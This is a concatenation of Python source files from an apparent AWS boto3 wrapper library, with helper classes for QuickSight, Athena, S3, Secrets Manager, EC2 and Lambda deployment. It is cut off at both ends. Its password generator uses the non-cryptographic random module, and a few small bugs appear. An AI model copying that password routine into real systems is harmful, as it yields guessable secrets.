max_status_checks else self._max_status_checks status_check_interval = status_check_interval if status_check_interval else self._status_check_interval # wait for stack "final" state status_check = 0 dashboard_version = self.quicksight_client.describe_dashboard( AwsAccountId=self._sts.account_id, DashboardId=dashboard_id).get("Dashboard").get("Version") while status_check < max_status_checks: status_check += 1 if dashboard_version["Status"].endswith("FAILED"): errors = ",".join([f"{error['Type']} - {error['Message']}" for error in dashboard_version["Errors"]]) self._logger.error("Dashboard: %s has known bad status: %s", name, dashboard_version["Status"]) self._logger.error("Error message(s): %s", errors) self._logger.error("Please fix the issue and try again.") return False elif dashboard_version["Status"] == "CREATION_SUCCESSFUL": self._logger.info("Dashboard: %s deployment complete", name) return True self._logger.debug("Dashboard: %s status is: %s", name, dashboard_version["Status"]) self._logger.debug("Waiting...") if status_check >= max_status_checks: raise RuntimeError("Timed out waiting for QuickSight dashboard to deploy") time.sleep(status_check_interval) dashboard_version = self.quicksight_client.describe_dashboard( AwsAccountId=self._sts.account_id, DashboardId=name).get("Dashboard").get("Version") self._logger.info("Publishing version: %s of dashboard: %s", dashboard_version["VersionNumber"], name) self.quicksight_client.update_dashboard_published_version( AwsAccountId=self._sts.account_id, DashboardId=dashboard_id, VersionNumber=dashboard_version["VersionNumber"], ) def create_or_update_athena_data_source(self, name, permissions=None): data_source = dict( AwsAccountId=self._sts.account_id, DataSourceId=name, Name=name, Type="ATHENA", DataSourceParameters={"AthenaParameters": {"WorkGroup": "primary"}}) if permissions: data_source["Permissions"] = permissions try: self.quicksight_client.describe_data_source(AwsAccountId=self._sts.account_id, DataSourceId=name) self._logger.info("Updating granted permissions for data source: %s", name) self.quicksight_client.update_data_source_permissions( AwsAccountId=data_source["AwsAccountId"], DataSourceId=data_source["DataSourceId"], GrantPermissions=data_source["Permissions"]) del data_source["Type"] del data_source["Permissions"] self._logger.info("Updating data source: %s", name) data_source_arn = self.quicksight_client.update_data_source(**data_source).get("Arn") self._wait_for_data_source_status(name, "UPDATE_SUCCESSFUL") except self.quicksight_client.exceptions.ResourceNotFoundException: self._logger.info("Creating data source: %s", name) data_source_arn = self.quicksight_client.create_data_source(**data_source).get("Arn") self._wait_for_data_source_status(name, "CREATION_SUCCESSFUL") return data_source_arn def create_or_update_athena_sql_data_set( self, name, sql, data_source_arn, columns, permissions=None, logical_table_map=None): data_set = { "AwsAccountId": self._sts.account_id, "DataSetId": name, "Name": name, "PhysicalTableMap": { name: { "CustomSql": { "DataSourceArn": data_source_arn, "Name": name, "SqlQuery": sql, "Columns": columns, } } }, "ImportMode": "SPICE", } if permissions: data_set["Permissions"] = permissions if logical_table_map: data_set["LogicalTableMap"] = logical_table_map try: self.quicksight_client.describe_data_set( AwsAccountId=self._sts.account_id, DataSetId=name ) self._logger.info("Updating granted permissions for data set: %s", name) if permissions: self.quicksight_client.update_data_set_permissions( AwsAccountId=data_set["AwsAccountId"], DataSetId=data_set["DataSetId"], GrantPermissions=data_set["Permissions"], ) del data_set["Permissions"] self._logger.info("Updating data set: %s", name) return self.quicksight_client.update_data_set(**data_set).get("Arn") except self.quicksight_client.exceptions.ResourceNotFoundException: self._logger.info("Creating data set: %s", name) return self.quicksight_client.create_data_set(**data_set) def create_or_update_group(self, name): try: self.quicksight_client.describe_group(AwsAccountId=self._sts.account_id, GroupName=name, Namespace="default") self._logger.warning("Updating quicksight groups is not currently supported; perhaps relevant when " "non-default namespaces are supported upstream") except self.quicksight_client.exceptions.ResourceNotFoundException: self._logger.info("Creating quicksight group: %s", name) return self.quicksight_client.create_group( AwsAccountId=self._sts.account_id, GroupName=name, Namespace="default") def delete_analysis_template(self, template_id): try: self.quicksight_client.describe_template(AwsAccountId=self._sts.account_id, TemplateId=template_id) self._logger.info("Deleting quicksight analysis template: %s", template_id) return self.quicksight_client.delete_template(AwsAccountId=self._sts.account_id, TemplateId=template_id) except self.quicksight_client.exceptions.ResourceNotFoundException: pass def delete_data_set(self, data_set_id): try: self.quicksight_client.describe_data_set(AwsAccountId=self._sts.account_id, DataSetId=data_set_id) self._logger.info("Deleting quicksight data set: %s", data_set_id) return self.quicksight_client.delete_data_set(AwsAccountId=self._sts.account_id, DataSetId=data_set_id) except self.quicksight_client.exceptions.ResourceNotFoundException: pass def delete_data_source(self, name): try: self.quicksight_client.describe_data_source(AwsAccountId=self._sts.account_id, DataSourceId=name) self._logger.info("Deleting data source: %s", name) return self.quicksight_client.delete_data_source(AwsAccountId=self._sts.account_id, DataSourceId=name) except self.quicksight_client.exceptions.ResourceNotFoundException: pass def delete_dashboard(self, name): try: self.quicksight_client.describe_dashboard(AwsAccountId=self._sts.account_id, DashboardId=name) self._logger.info("Deleting dashboard: %s", name) return self.quicksight_client.delete_dashboard(AwsAccountId=self._sts.account_id, DashboardId=name) except self.quicksight_client.exceptions.ResourceNotFoundException: pass def get_admin_principal_arns(self): # get the largest chunk of users possible according to AWS API limits max_results = 100 quicksight_users = list() account_id = self._sts.account_id self._logger.debug("Reading first chunk of quicksight users") users_chunk = self.quicksight_client.list_users( AwsAccountId=self._sts.account_id, MaxResults=max_results, Namespace="default") quicksight_users.extend(users_chunk.get("UserList")) while users_chunk.get("NextToken"): self._logger.debug("Reading next chunk of quicksight users") users_chunk = self.quicksight_client.list_users( AwsAccountId=account_id, NextToken=users_chunk.get("NextToken"), MaxResults=max_results, Namespace="default") quicksight_users.extend(users_chunk.get("UserList")) return [user["Arn"] for user in quicksight_users if user["Role"] == "ADMIN" and user["Arn"] != "N/A"] def get_data_set_arn(self, name): try: return self.quicksight_client.describe_data_set( AwsAccountId=self._sts.account_id, DataSetId=name).get("DataSet").get("Arn") except self.quicksight_client.exceptions.ResourceNotFoundException: self._logger.warning("Could not find data set with ID: %s", name) return "" def get_group_arn(self, name): try: return self.quicksight_client.describe_group( AwsAccountId=self._sts.account_id, GroupName=name, Namespace="default").get("Group").get("Arn") except self.quicksight_client.exceptions.ResourceNotFoundException: self._logger.warning("Could not find group with name: %s", name) return "" def list_analysis_templates(self): # get the largest chunk of analysis templates possible according to AWS API limits max_results = 100 analysis_templates = list() account_id = self._sts.account_id self._logger.debug("Reading first chunk of quicksight analysis templates") analysis_template_chunk = self.quicksight_client.list_templates( AwsAccountId=self._sts.account_id, MaxResults=max_results) analysis_templates.extend(analysis_template_chunk.get("TemplateSummaryList")) while analysis_template_chunk.get("NextToken"): self._logger.debug("Reading next chunk of quicksight analysis templates") analysis_template_chunk = self.quicksight_client.list_templates( AwsAccountId=account_id, NextToken=analysis_template_chunk.get("NextToken"), MaxResults=max_results) analysis_templates.extend(analysis_template_chunk.get("TemplateSummaryList")) return analysis_templates def list_dashboards(self): # get the largest chunk of dashboards possible according to AWS API limits max_results = 100 dashboards = list() account_id = self._sts.account_id self._logger.debug("Reading first chunk of quicksight dashboards") dashboard_chunk = self.quicksight_client.list_dashboards( AwsAccountId=self._sts.account_id, MaxResults=max_results) dashboards.extend(dashboard_chunk.get("DashboardSummaryList")) while dashboard_chunk.get("NextToken"): self._logger.debug("Reading next chunk of quicksight dashboards") dashboard_chunk = self.quicksight_client.list_dashboards( AwsAccountId=account_id, NextToken=dashboard_chunk.get("NextToken"), MaxResults=max_results) dashboards.extend(dashboard_chunk.get("DashboardSummaryList")) return dashboards def list_data_sets(self): # get the largest chunk of data sets possible according to AWS API limits max_results = 100 data_sets = list() account_id = self._sts.account_id self._logger.debug("Reading first chunk of quicksight data sets") data_set_chunk = self.quicksight_client.list_data_sets( AwsAccountId=self._sts.account_id, MaxResults=max_results) data_sets.extend(data_set_chunk.get("DataSetSummaries")) while data_set_chunk.get("NextToken"): self._logger.debug("Reading next chunk of quicksight data sets") data_set_chunk = self.quicksight_client.list_data_sets( AwsAccountId=account_id, NextToken=data_set_chunk.get("NextToken"), MaxResults=max_results) data_sets.extend(data_set_chunk.get("DataSetSummaries")) return data_sets def list_data_sources(self): # get the largest chunk of data sources possible according to AWS API limits max_results = 100 data_sources = list() account_id = self._sts.account_id self._logger.debug("Reading first chunk of quicksight data sources") data_source_chunk = self.quicksight_client.list_data_sources( AwsAccountId=self._sts.account_id, MaxResults=max_results) data_sources.extend(data_source_chunk.get("DataSources")) while data_source_chunk.get("NextToken"): self._logger.debug("Reading next chunk of quicksight data sources") data_source_chunk = self.quicksight_client.list_data_sources( AwsAccountId=account_id, NextToken=data_source_chunk.get("NextToken"), MaxResults=max_results) data_sources.extend(data_source_chunk.get("DataSources")) return data_sources def set_template_permissions(self, template_id, permissions): return self.quicksight_client.update_template_permissions( AwsAccountId=self._sts.account_id, TemplateId=template_id, GrantPermissions=permissions) def update_template_permissions(self, name, permissions): self._logger.info("Updating permissions on quicksight template: %s", name) self.quicksight_client.update_template_permissions( AwsAccountId=self._sts.account_id, TemplateId=name, GrantPermissions=permissions) <file_sep>from madeira import session from madeira_utils import loggers class RdsCluster(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.rds_client = self._session.session.client('rds') def disable_cluster_termination_protection(self, cluster_id): return self.rds_client.modify_db_cluster( DBClusterIdentifier=cluster_id, DeletionProtection=False) # TODO: find usage and replace with list_clusters def get_clusters(self): return self.rds_client.describe_db_clusters() # TODO: list_global_clusters (consistency) def get_global_clusters(self): return self.rds_client.describe_global_clusters() # TODO: list_instances (consistency) def get_instances(self): return self.rds_client.describe_db_instances() def list_clusters(self): return self.rds_client.describe_db_clusters().get('DBClusters') <file_sep>from madeira import kms, sts, session from madeira_utils import loggers import time class Athena(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=profile_name, region=region) self.athena_client = self._session.session.client('athena') self._kms = kms.Kms(logger=logger, profile_name=profile_name, region=region) self._logger = logger if logger else loggers.get_logger() self._max_query_checks = 10 self._interval = 3 def _get_default_output_location(self): return (f'aws-athena-query-results-{self._sts.account_id}-' f'{self._session.region}') def execute_query(self, database, sql, output_location=None, workgroup='primary'): if not output_location: output_location = self._get_default_output_location() self._logger.debug('Executing query: %s', sql) execution_id = self.athena_client.start_query_execution( QueryString=sql, QueryExecutionContext={'Database': database}, ResultConfiguration={'OutputLocation': output_location}, WorkGroup=workgroup ).get('QueryExecutionId') self._logger.debug('Query execution ID: %s', execution_id) # wait for query to complete and validate status # TODO: let waiting parameters be overridden at the method level for i in range(0, self._max_query_checks): execution_status = self.athena_client.get_query_execution( QueryExecutionId=execution_id).get('QueryExecution').get('Status') execution_state = execution_status.get('State') execution_state_reason = execution_status.get('StateChangeReason') if execution_state == 'SUCCEEDED': self._logger.info('Query %s successful', execution_id) break elif execution_state == 'FAILED': self._logger.critical('Query %s failed', execution_id) self._logger.critical('Reason: %s', execution_state_reason) break elif execution_state == 'CANCELLED': self._logger.error('Query %s was cancelled - human intervention?', execution_id) break time.sleep(self._interval) def update_workgroup(self, results_bucket=None, workgroup='primary', description='', requester_pays=False, publish_cloudwatch=True, kms_key='alias/aws/s3'): if not results_bucket: results_bucket = self._get_default_output_location() # athena's API doesn't understand KMS key aliases, so we'll look up the ARN if kms_key == 'alias/aws/s3': self._logger.info('Looking up KMS key ARN for key: %s', kms_key) kms_key = self._kms.get_key(kms_key)['KeyMetadata']['Arn'] self._logger.info('Got ARN: %s', kms_key) self._logger.info('Updating Athena default Workgroup configuration') return self.athena_client.update_work_group( WorkGroup=workgroup, Description=description, ConfigurationUpdates={ 'EnforceWorkGroupConfiguration': True, 'ResultConfigurationUpdates': { 'OutputLocation': f's3://{results_bucket}/', 'EncryptionConfiguration': { 'EncryptionOption': 'SSE_KMS', 'KmsKey': kms_key }, }, 'PublishCloudWatchMetricsEnabled': publish_cloudwatch, 'RequesterPaysEnabled': requester_pays }, State='ENABLED' ) <file_sep>import base64 import json import random import string from madeira import session from madeira_utils import loggers class SecretsManager(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.secrets_manager_client = self._session.session.client(service_name="secretsmanager") @staticmethod def generate_clean_password(size=32, chars=string.ascii_letters + string.digits): """Generates a password free of special characters.""" return "".join(random.choice(chars) for _ in range(size)) def get_secret(self, secret_name): try: get_secret_value_response = self.secrets_manager_client.get_secret_value(SecretId=secret_name) except self.secrets_manager_client.exceptions.ResourceNotFoundException: self._logger.error("%s: secret does not exist", secret_name) return None if "SecretString" in get_secret_value_response: secret = json.loads(get_secret_value_response.get("SecretString", "{}")) else: secret = base64.b64decode(get_secret_value_response["SecretBinary"]) return secret def store_secret(self, secret_name, secret_description, secret): return self.secrets_manager_client.create_secret( Name=secret_name, Description=secret_description, SecretString=json.dumps(secret), ) def update_secret(self, secret_name, secret): return self.secrets_manager_client.update_secret( SecretId=secret_name, SecretString=json.dumps(secret), ) <file_sep>from collections import OrderedDict from datetime import date, datetime, timedelta import json import re from madeira import session, sts from madeira_utils import loggers, utils class S3(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=None, region=None) self.s3_client = self._session.session.client("s3") self.s3_control_client = self._session.session.client("s3control") self.s3_resource = self._session.session.resource("s3") @staticmethod def _get_retention_end_date(retain_years=7): date_today = datetime.utcnow() try: return date_today.replace(year=date_today.year + retain_years) except ValueError: return date_today + ( date(date_today.year + retain_years, 1, 1) - date(date_today.year, 1, 1) ) def create_folders(self, bucket_name, folders): # create a set of "folders" (really, a pre-provisioned set of empty objects which represent S3 object # prefixes) which will provide the ability for external applications (i.e. RedPoint Interaction, AWS Console) # to "browse" the S3 bucket as if it were a filesystem with a bunch of empty folders. folder_objects = self.get_folder_objects(folders) folder_object_keys = list(folder_objects.keys()) for key in folder_object_keys: try: self.get_object(bucket_name, key) self._logger.debug( "Skipping folder object: %s since it already exists", key ) del folder_objects[key] except self.s3_client.exceptions.NoSuchKey: continue self.create_objects(bucket_name, folder_objects) def create_objects(self, bucket_name, objects): for object_key, value in objects.items(): self._logger.info("Creating s3://%s/%s", bucket_name, object_key) self.s3_resource.Object(bucket_name, object_key).put(Body=value) def delete_object(self, bucket_name, object_key): self._logger.debug("Deleting s3://%s/%s", bucket_name, object_key) self.s3_client.delete_object(Bucket=bucket_name, Key=object_key) def delete_objects(self, bucket_name, object_keys): chunk_size = 1000 for i in range(0, len(object_keys), chunk_size): chunk = object_keys[i: i + chunk_size] object_list = { "Objects": [{"Key": object_key["Key"]} for object_key in chunk], "Quiet": True, } self.s3_client.delete_objects(Bucket=bucket_name, Delete=object_list) return len(object_keys) def delete_object_versions(self, bucket_name, object_keys): chunk_size = 1000 for i in range(0, len(object_keys), chunk_size): chunk = object_keys[i: i + chunk_size] object_list = { "Objects": [{"Key": object_key["Key"], "VersionId": object_key["VersionId"]} for object_key in chunk], "Quiet": True, } self.s3_client.delete_objects(Bucket=bucket_name, Delete=object_list, BypassGovernanceRetention=True) return len(object_keys) def does_bucket_exist(self, bucket_name): try: self.s3_resource.meta.client.head_bucket(Bucket=bucket_name) return True except self.s3_client.exceptions.ClientError as e: error_code = e.response.get("Error", {}).get("Code") if error_code == "403": # bucket exists, but we don't have permissions to it return True elif error_code == "404": return False else: raise e def get_all_buckets(self): return [bucket["Name"] for bucket in self.s3_client.list_buckets().get("Buckets")] def get_all_object_keys(self, bucket, prefix=""): """ Returns all s3 keys (objects) in the named bucket as a list of boto.s3.key.Key objects. """ paginator = self.s3_client.get_paginator("list_objects") page_iterator = paginator.paginate(Bucket=bucket, Prefix=prefix) try: return [key for page in page_iterator for key in page.get("Contents", [])] except self.s3_client.exceptions.NoSuchBucket: self._logger.warning("Bucket: %s does not exist", bucket) def get_all_object_versions(self, bucket, prefix=""): """ Returns all s3 keys (object versions) in the named bucket as a list of boto.s3.key.Key objects. """ # seemingly, pagination wrappers don't work for "list_object_versions" even though they're supported object_list = [] try: response = self.s3_client.list_object_versions(Bucket=bucket, Prefix=prefix) except self.s3_client.exceptions.NoSuchBucket: self._logger.warning("Bucket: %s does not exist", bucket) return object_list object_list.extend(response.get('Versions', [])) object_list.extend(response.get('DeleteMarkers', [])) # per https://docs.aws.amazon.com/AmazonS3/latest/dev/list-obj-version-enabled-bucket.html while response.get('KeyMarker') or response.get('VersionIdMarker'): response = self.s3_client.list_object_versions( KeyMarker=response['KeyMarker'], VersionIdMarker=response['VersionIdMarker']) object_list.extend(response.get('Versions', [])) object_list.extend(response.get('DeleteMarkers', [])) return object_list @staticmethod def get_folder_object_key(folder): return f"{folder}/.folder" def get_folder_objects(self, folder_list): """Get list of S3 'folder' object keys from a list of folders that may contain blanks, dupes, or comments.""" folder_objects = OrderedDict() folder_list = sorted(folder_list) for folder in folder_list: folder = folder.strip() if not folder: continue if folder.startswith("#"): continue object_key = self.get_folder_object_key(folder) folder_objects[object_key] = "" return folder_objects def get_object(self, bucket, object_key): try: self._logger.debug('Loading s3://%s/%s', bucket, object_key) return self.s3_client.get_object(Bucket=bucket, Key=object_key) except self.s3_client.exceptions.NoSuchKey: self._logger.debug("Object not found: s3://%s/%s", bucket, object_key) raise def get_object_contents(self, bucket, object_key, is_json=False): object_body = self.get_object(bucket, object_key).get('Body').read().decode('utf-8') return json.loads(object_body) if is_json else object_body def get_object_md5_base64(self, bucket_name, object_key): try: source_object = self.s3_client.get_object(Bucket=bucket_name, Key=object_key) return utils.get_base64_sum_of_stream(source_object.get("Body"), hash_type='md5') except self.s3_client.exceptions.NoSuchKey: return '' def get_old_object_keys(self, bucket, max_age_hours=24, prefix=""): """ Returns all s3 keys (objects) older than max-age hours in the named bucket as a list of boto.s3.key.Key objects. """ past_time_at_max_age = datetime.now() - timedelta(hours=max_age_hours) paginator = self.s3_client.get_paginator("list_objects") page_iterator = paginator.paginate(Bucket=bucket, Prefix=prefix) bucket_object_list = [] for page in page_iterator: for key in page.get("Contents", []): if key["LastModified"].replace(tzinfo=None) < past_time_at_max_age: bucket_object_list.append(key) return bucket_object_list def put_object(self, bucket_name, object_key, body, encoding="utf-8", md5=None, as_json=False, content_type=None): if as_json: body = json.dumps(body) object_args = dict(Bucket=bucket_name, Key=object_key, Body=body, ContentEncoding=encoding) # user-attested object checksums must be base64-encoded for submission to S3. See also: # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html#S3.Client.put_object if md5: object_args["ContentMD5"] = md5 if content_type: object_args["ContentType"] = content_type self._logger.info("Uploading s3://%s/%s", bucket_name, object_key) return self.s3_client.put_object(**object_args) def rename_object(self, bucket_name, source_key, dest_key): self._logger.debug("Renaming %s to %s in bucket: %s", source_key, dest_key, bucket_name) self.s3_resource.Object(bucket_name, dest_key).copy_from(CopySource=f"{bucket_name}/{source_key}") self.s3_resource.Object(bucket_name, source_key).delete() return True def set_no_public_access_on_account(self): self._logger.info( "Blocking all public access attributes for all future bucket creation in account: %s", self._sts.account_id) return self.s3_control_client.put_public_access_block( PublicAccessBlockConfiguration={ "BlockPublicAcls": True, "IgnorePublicAcls": True, "BlockPublicPolicy": True, "RestrictPublicBuckets": True, }, AccountId=self._sts.account_id ) def set_object_lock(self, bucket_name, object_key, retention_mode, retention_years): self._logger.info("Placing retention-based lock on: %s", bucket_name, object_key) return self.s3_client.put_object_retention( Bucket=bucket_name, Key=object_key, Retention={ "Mode": retention_mode, "RetainUntilDate": self._get_retention_end_date(retention_years), } ) def sync_files(self, bucket, files): changed_files = [] for file in files: result = self.upload_asset_if_changed(bucket, file['name'], file['root']) if result: changed_files.append(result) return changed_files def upload_asset_if_changed(self, bucket, file, root): key_prefix = re.sub('^assets/*', '', root) if key_prefix: key_prefix += '/' object_key = f"{key_prefix}{file}" local_path = f"{root}/{file}" binary = False if file.endswith('.html'): content_type = 'text/html' elif file.endswith('.css'): content_type = 'text/css' elif file.endswith('.js'): content_type = 'text/javascript' elif file.endswith('.ico'): binary = True content_type = 'image/x-icon' elif file.endswith('.png'): binary = True content_type = 'image/png' elif file.endswith('.jpg') or file.endswith('jpeg'): binary = True content_type = 'image/jpeg' else: content_type = 'text/plain' self._logger.debug("%s: processing as %s; binary=%s", local_path, content_type, binary) base64_md5_local = utils.get_base64_sum_of_file(local_path, hash_type='md5') self._logger.debug("%s: Local copy base64 md5: %s", local_path, base64_md5_local) base64_md5_in_s3 = self.get_object_md5_base64(bucket, object_key) self._logger.debug("%s: S3 object base64 md5: %s", local_path, base64_md5_in_s3) if base64_md5_local == base64_md5_in_s3: self._logger.info('Checksums of local and S3 copies of %s are identical; skipping', local_path) return False self.put_object(bucket, object_key, utils.get_file_content(local_path, binary=binary), content_type=content_type) return object_key <file_sep>from madeira import session from madeira_utils import loggers class Logs(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.logs_client = self._session.session.client('logs') def get_log_groups(self): return self.logs_client.describe_log_groups().get('logGroups') def delete_log_group(self, log_group): return self.logs_client.delete_log_group(logGroupName=log_group) <file_sep>from madeira import session from madeira_utils import loggers class Ec2(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.ec2_client = self._session.session.client("ec2") def assure_key_pair(self, key_name, key_material): try: self.ec2_client.describe_key_pairs(KeyNames=[key_name]) self._logger.info("Key pair with already exists with name: %s", key_name) except self.ec2_client.exceptions.ClientError as e: if "does not exist" in str(e): self._logger.info("Importing SSH public key as: %s", key_name) self.ec2_client.import_key_pair( KeyName=key_name, PublicKeyMaterial=key_material ) else: raise def delete_key_pair(self, key_name): self._logger.info("Deleting EC2 key pair: %s", key_name) self.ec2_client.delete_key_pair(KeyName=key_name) def disable_termination_protection(self, instance_id): return self.ec2_client.modify_instance_attribute( InstanceId=instance_id, DisableApiTermination={"Value": False} ) def list_instances(self): return self.ec2_client.describe_instances().get("Reservations") <file_sep>import time from madeira_utils import hashing, loggers, utils from madeira import session, sts class AwsLambda: def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=None, region=None) self.lambda_client = self._session.session.client('lambda') def _create_function(self, name, role, function_file_path, description='', vpc_config=None, memory_size=128, timeout=30, reserved_concurrency=None, layer_arns=None, runtime='python3.8', handler='handler.handler'): layer_arns = layer_arns if layer_arns else [] vpc_config = vpc_config if vpc_config else {} self._logger.info('Deploying function: %s from file: %s', name, function_file_path) try: function_arn = self.lambda_client.create_function( FunctionName=name, Runtime=runtime, Role=role, Handler=handler, Code={'ZipFile': utils.get_zip_content(function_file_path)}, Description=description, Timeout=timeout, Layers=layer_arns, MemorySize=memory_size, Publish=True, VpcConfig=vpc_config).get('FunctionArn') except self.lambda_client.exceptions.ResourceConflictException: self._logger.warning('Function: %s already exists', name) function_arn = self.lambda_client.get_function(FunctionName=name).get('Configuration').get('FunctionArn') if reserved_concurrency: self._set_reserved_concurrency(name, reserved_concurrency) return function_arn def _set_reserved_concurrency(self, name, reserved_concurrency): if reserved_concurrency: self._logger.info('setting reserved concurrency to %s on function %s', reserved_concurrency, name) self.lambda_client.put_function_concurrency( FunctionName=name, ReservedConcurrentExecutions=reserved_concurrency) def _update_function(self, name, role, function_file_path, description='', vpc_config=None, memory_size=128, timeout=30, reserved_concurrency=None, layer_arns=None, runtime='python-3.8', handler='handler.handler'): layer_arns = layer_arns if layer_arns else [] vpc_config = vpc_config if vpc_config else {} self._logger.info('%s: updating lambda function code', name) self.lambda_client.update_function_code( FunctionName=name, ZipFile=utils.get_zip_content(function_file_path), Publish=True ) self._logger.info('%s: updating lambda function configuration', name) self.lambda_client.update_function_configuration( FunctionName=name, Runtime=runtime, Role=role, Handler=handler, Description=description, VpcConfig=vpc_config, Timeout=timeout, MemorySize=memory_size, Layers=layer_arns ) if reserved_concurrency: self._set_reserved_concurrency(name, reserved_concurrency) def _wait_for_availability(self, function_arn): max_status_checks = 10 status_check_interval = 20 # wait for stack "final" state status_check = 0 finished_status = 'Active' while status_check < max_status_checks: status_check += 1 lambda_function = self.lambda_client.get_function(FunctionName=function_arn) if lambda_function['Configuration']['State'] == finished_status: self._logger.debug( "Lambda function %s is now: %s", lambda_function["Configuration"]["FunctionName"], finished_status ) return self._logger.debug( "Lambda function: %s status is: %s - waiting for status: %s", lambda_function["Configuration"]["FunctionName"], lambda_function['Configuration']['State'], finished_status) if status_check >= max_status_checks: raise RuntimeError( "Timed out waiting for lambda function: %s to be available", lambda_function["Configuration"]["FunctionName"]) time.sleep(status_check_interval) def add_permission_for_s3_bucket(self, name, bucket): self.remove_permission_for_s3_bucket(name, bucket) self._logger.info('Allowing invocation of function: %s based on events from S3 bucket: %s', name, bucket) self.lambda_client.add_permission( Action='lambda:InvokeFunction', FunctionName=name, Principal='s3.amazonaws.com', SourceAccount=self._sts.account_id, SourceArn=f'arn:aws:s3:::{bucket}', StatementId=f'permission_for_{bucket}' ) def create_or_update_function(self, name, role, function_file_path, description='', vpc_config=None, memory_size=128, timeout=30, reserved_concurrency=None, layers=None, runtime='python3.8', handler='handler.handler'): if layers: layer_arns = [layer_meta['arn'] for name, layer_meta in layers.items()] layers_updated = [name for name, layer_meta in layers.items() if layer_meta['updated']] else: layer_arns = [] layers_updated = [] try: lambda_function = self.lambda_client.get_function(FunctionName=name) self._logger.debug('%s: lambda function: already exists; checking on updates', name) function_arn = lambda_function['Configuration']['FunctionArn'] existing_layers = [layer['Arn'] for layer in lambda_function['Configuration']['Layers']] added_layers = [layer_arn for layer_arn in layer_arns if layer_arn not in existing_layers] removed_layers = [layer_arn for layer_arn in existing_layers if layer_arn not in layer_arns] # Calculate the SHA256 checksum of the file (whether a zip file or not) file_sha256_string = utils.get_base64_sum_of_file(function_file_path) if function_file_path.endswith('.zip'): aws_file_sha256_string = lambda_function.get('Configuration').get('CodeSha256') else: # AWS stores lambdas in zip files in a "hidden" S3 bucket - we need to extract the handler as-stored # in S3 in order to compare it to our local file. This reads the whole encapsulating zip in memory; # we're assuming all lambdas stay relatively small aws_file_sha256_string = utils.get_base64_sum_of_file_in_zip_from_url( lambda_function.get('Code').get('Location'), 'handler.py') if file_sha256_string != aws_file_sha256_string: self._logger.info('%s: updating lambda function for intrinsic code change', name) elif layers_updated: self._logger.info( '%s: updating lambda only for code changed in related layers: %s', name, layers_updated) elif added_layers or removed_layers: if added_layers: self._logger.info('%s: updating lambda function for added layers: %s', name, added_layers) if removed_layers: self._logger.info('%s: updating lambda function for removed layers: %s', name, removed_layers) else: self._logger.info('%s: no lambda function code nor related layer changes; no update required', name) return function_arn self._update_function( name, role, function_file_path, description=description, vpc_config=vpc_config, memory_size=memory_size, timeout=timeout, reserved_concurrency=reserved_concurrency, layer_arns=layer_arns, runtime=runtime, handler=handler) except self.lambda_client.exceptions.ResourceNotFoundException: self._logger.info('Function: %s does not yet exist', name) function_arn = self._create_function( name, role, function_file_path, description=description, vpc_config=vpc_config, memory_size=memory_size, timeout=timeout, reserved_concurrency=reserved_concurrency, layer_arns=layer_arns, runtime=runtime, handler=handler) # VPC-scoped lambdas sometimes take more time to spin up, so we wait for their final state if vpc_config: self._wait_for_availability(function_arn) return function_arn def delete_function(self, name, qualifier=None): args = {'FunctionName': name} if qualifier: args['Qualifier'] = qualifier try: self.lambda_client.delete_function(**args) self._logger.info('Function: %s deleted', name) except self.lambda_client.exceptions.ResourceNotFoundException: self._logger.warning('Function: %s does not exist', name) def delete_layer_version(self, name, version): try: self.lambda_client.delete_layer_version(LayerName=name, VersionNumber=version) self._logger.info('Layer: %s version: %s deleted', name, version) except self.lambda_client.exceptions.ResourceNotFoundException: self._logger.warning('Layer: %s version: %s does not exist', name, version) def deploy_layer(self, name, layer_path, description='', runtimes=None): # for layers with more complexity that are better off "just zipped" if layer_path.endswith('.zip'): with open(layer_path, 'rb') as f: zip_file_bytes = f.read() # for layers that consist simply of a flat directory (no subdirs) with code (text) files. else: in_memory_zip = utils.get_layer_zip(layer_path) zip_file_bytes = in_memory_zip.getvalue() file_sha256_string = hashing.get_base64_sum_of_data(zip_file_bytes) for lambda_layer_version in self.list_layer_versions(name): layer_version_meta = self.lambda_client.get_layer_version_by_arn( Arn=lambda_layer_version['LayerVersionArn']) aws_sha256_string = layer_version_meta['Content']['CodeSha256'] if aws_sha256_string == file_sha256_string: self._logger.info('Layer with ARN: %s is already current', lambda_layer_version['LayerVersionArn']) return {'arn': lambda_layer_version['LayerVersionArn'], 'updated': False} if not runtimes: runtimes = ['python3.8'] self._logger.info('Deploying layer: %s in path: %s for runtimes: %s', name, layer_path, runtimes) layer_arn = self.lambda_client.publish_layer_version( LayerName=name, Description=description, # must be a 'bytes' object Content={'ZipFile': zip_file_bytes}, CompatibleRuntimes=runtimes).get('LayerVersionArn') self._logger.debug('Layer ARN: %s', layer_arn) return {'arn': layer_arn, 'updated': True} def deploy_layers(self, layers): for name, layer_meta in layers.items(): layers[name].update(self.deploy_layer(name, layer_meta['path'])) def get_function_arn(self, name): return f"arn:aws:lambda:{self._session.region}:{self._sts.account_id}:function:{name}" def list_functions(self): response = self.lambda_client.list_functions() functions = response.get('Functions') while response.get('NextMarker'): response = self.lambda_client.list_functions(NextMarker=response.get('NextMarker')) functions.extend(response.get('Functions')) return functions def list_layers(self): return self.lambda_client.list_layers().get('Layers') def list_layer_versions(self, name): response = self.lambda_client.list_layer_versions(LayerName=name) layer_versions = response.get('LayerVersions') while response.get('NextMarker'): response = self.lambda_client.list_layer_versions(LayerName=name, NextMarker=response.get('NextMarker')) layer_versions.extend(response.get('LayerVersions')) return layer_versions def 